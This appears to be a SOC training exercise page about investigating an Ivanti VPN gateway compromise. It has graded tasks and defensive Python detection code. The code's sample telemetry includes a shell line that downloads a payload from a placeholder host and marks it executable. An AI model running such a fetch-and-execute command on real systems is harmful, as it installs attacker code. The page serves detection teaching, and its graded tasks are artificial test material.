
Edge Device Exploitation: VPN Zero-Day
Investigate a breach targeting exposed edge security appliances. In this scenario, an attacker exploits Ivanti Connect Secure CVE-2025-22457 to obtain unauthenticated code execution, spawns a shell from the gateway web process, retrieves a Linux payload, and attempts to preserve access using edge-device service abuse patterns similar to FortiGate SSL-VPN post-exploitation tradecraft. Analyze SIEM, XDR, and firewall evidence to identify the spawned shell, suspicious domain, local sync script, and defensive block policy.
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Pinpointing the Sensor That Paged the SOC
(5 points) Your shift opens with a perimeter security alert: an exploit attempt was flagged against the internet-facing gateway corp-ivnt-gw-01 from an external IP. Before tracing the attacker, establish provenance: pivot to the SIEM panel, locate the exploit-detection event, and determine which internal monitoring system raised it (the value recorded in its log source field).
Confirming Code Execution on the Gateway
(10 points) With the detecting sensor confirmed, pivot to what the exploit actually achieved. During the gateway compromise the exposed web service was driven to spawn a process it should never launch, a clear sign the adversary obtained command execution. Work the XDR process hierarchy for corp-ivnt-gw-01 and identify the name of that anomalous child process.
Recovering the Implant Staged on the Gateway
(5 points) Having confirmed the interpreter the exploit spawned, follow what it did next. That process reached out to external infrastructure and wrote a file to the gateway's disk: the attacker's first-stage implant. Using the XDR file artifacts and the suspicious process command line on corp-ivnt-gw-01, identify the exact filename written to disk.
Identifying the Implant's Callback Host
(5 points) The implant on the gateway did not act alone. Shortly after it landed, an outbound HTTP request left the environment toward attacker-controlled infrastructure, and a SIEM network-proxy event was flagged high severity against the usual informational noise. Inspect that flagged proxy event and determine the external domain the internal host tried to reach.
Crediting the Control That Stopped the Callback
(10 points) You now know where the gateway implant tried to phone home. The good news: the perimeter held. When the gateway shell attempted a follow-up connection back to that same external host, an automated firewall policy denied the session. Inspect the firewall panel, locate the blocked outbound session, and name the defensive policy that stopped it.
Hunting the Attacker's Foothold on the Gateway
(5 points) Containment bought time, but an adversary who exploited the gateway will try to survive a reboot. An alert fired for potential persistence on corp-ivnt-gw-01: the init system was seen spawning a long-running service process that should not be a direct child of init. Examine the XDR process hierarchy for the gateway and submit the full command line used to launch that persistent service.
Tracing the Pivot Onto the LDAP Server
(5 points) With the gateway foothold mapped, widen the scope inward. During host triage of the directory server srv-ldap-01, a root cron entry was found running a local shell script shortly after the edge-device compromise, a likely lateral-movement or staging step deeper in the network. Review the relevant SIEM cron message and identify the name of the script that was executed.
Resolving the Follow-On Activity on the DevOps Workstation
(5 points) The investigation's final thread leads off the perimeter and onto an internal endpoint. Several days after the gateway was compromised, follow-on activity surfaced on the developer workstation wks-devops-01: an operator launched a PowerShell script tied to edge-configuration work. Walk the XDR process ancestry on that host and determine the exact filename of the PowerShell script that was run.
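The gateway-side checks in the tasks above (a web front end spawning an interpreter, a payload fetched to disk by that interpreter, a high-severity proxy request matched to the firewall deny that blocked the same destination, and an unexpected direct child of init) can be expressed as small functions over the raw XDR, proxy and firewall records. The Python below is an added example written for this page, not tooling from the training platform or from Ivanti; every host, PID, process name, domain, IP address and policy name in it is constructed sample telemetry, and none of it is the scenario's answer.

```python
import os
import shlex
from dataclasses import dataclass

# Process names treated as command interpreters when spawned by a web front end.
SHELLS = {"sh", "bash", "dash", "ash", "busybox", "python", "python3", "perl"}
# Assumed name(s) of the appliance's web front-end process (constructed; not taken
# from any vendor's process list).
WEB_PROCESSES = {"web", "httpd"}
# Assumed services that may legitimately run as direct children of PID 1.
INIT_ALLOWLIST = {"web", "sshd", "cron", "rsyslogd", "getty"}


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    parent: str   # name of the parent process
    name: str     # basename of the executable
    cmdline: str


def web_spawned_shell(events):
    """Flag a web-facing process launching an interpreter: code execution via the web service."""
    return [e for e in events if e.parent in WEB_PROCESSES and e.name in SHELLS]


def unexpected_init_children(events):
    """Flag children of PID 1 that are not on the appliance's service allowlist (persistence check)."""
    return [e for e in events if e.ppid == 1 and e.name not in INIT_ALLOWLIST]


def dropped_files(cmdline):
    """Recover output paths from a one-liner that fetches a payload.

    Handles curl -o/--output, wget -O/--output-document and '>' redirection,
    and unwraps `sh -c "<script>"` so the inner command is tokenised too.
    """
    tokens = shlex.split(cmdline)
    if len(tokens) >= 3 and os.path.basename(tokens[0]) in SHELLS and tokens[1] == "-c":
        tokens = shlex.split(tokens[2])
    paths, tool = [], None
    for i, tok in enumerate(tokens):
        if tok in ("curl", "wget"):
            tool = tok
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        is_output_flag = (
            tok == ">"
            or (tool == "curl" and tok in ("-o", "--output"))
            or (tool == "wget" and tok in ("-O", "--output-document"))
        )
        if is_output_flag and nxt:
            paths.append(nxt)
    return paths


def correlate_callback(proxy_events, fw_events):
    """Map each high-severity proxy destination to the firewall deny policy that blocked
    the same destination IP (None if no deny was recorded)."""
    denies = {f["dst_ip"]: f["policy"] for f in fw_events if f["action"] == "deny"}
    return {p["domain"]: denies.get(p["dst_ip"]) for p in proxy_events if p["severity"] == "high"}


def triage(procs, proxy, fw):
    """Run all checks and return a summary an analyst could paste into a ticket."""
    shells = web_spawned_shell(procs)
    return {
        "exec_child": [e.name for e in shells],
        "dropped": [p for e in shells for p in dropped_files(e.cmdline)],
        "persistence": [e.cmdline for e in unexpected_init_children(procs)],
        "callbacks": correlate_callback(proxy, fw),
    }


# Constructed sample telemetry (documentation IP ranges and a reserved example TLD).
SAMPLE_PROCS = [
    ProcEvent("corp-ivnt-gw-01", 1, 0, "", "init", "/sbin/init"),
    ProcEvent("corp-ivnt-gw-01", 812, 1, "init", "web", "/home/bin/web"),
    ProcEvent("corp-ivnt-gw-01", 900, 1, "init", "sshd", "/usr/sbin/sshd -D"),
    ProcEvent("corp-ivnt-gw-01", 4410, 812, "web", "sh",
              'sh -c "curl -s http://update-cdn.example/s -o /tmp/.cache/svcd && chmod +x /tmp/.cache/svcd"'),
    ProcEvent("corp-ivnt-gw-01", 4422, 1, "init", "svcd", "/tmp/.cache/svcd --daemon"),
]
SAMPLE_PROXY = [
    {"src": "10.20.0.5", "domain": "cdn.example.net", "dst_ip": "198.51.100.10", "severity": "info"},
    {"src": "10.20.0.5", "domain": "update-cdn.example", "dst_ip": "203.0.113.77", "severity": "high"},
]
SAMPLE_FW = [
    {"src": "10.20.0.5", "dst_ip": "198.51.100.10", "dport": 443, "action": "allow", "policy": "Allow-Web-Egress"},
    {"src": "10.20.0.5", "dst_ip": "203.0.113.77", "dport": 443, "action": "deny", "policy": "Block-C2-Egress"},
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PROCS, SAMPLE_PROXY, SAMPLE_FW).items():
        print(f"{key}: {value}")
```

The parent-name check is deliberately stricter than a generic "shell spawned" rule: on an appliance, the web process forking `sh` is the signal, while `sshd` or `cron` forking a shell is routine. Correlating proxy and firewall records on destination IP rather than domain matters because firewall logs usually carry no hostname, so the proxy event is what ties the blocked session back to the domain the implant tried to reach.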
8 tasks · 50 points total
Skills You'll Build
Requires foundational alert triage skills; multiple data sources (SIEM, XDR, firewall) must be correlated.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
- Familiarity with Firewall concepts
More Operations
Credential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
Malicious npm Package: Postinstall Infostealer
A developer at a software company installs a typosquatted npm package. The package's postinstall hook silently reads environment variables, SSH keys, and cloud credentials from the user profile and POSTs them to an attacker endpoint before the terminal even finishes. Trace the process tree, the file reads, and the exfiltration traffic to reconstruct the full chain.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.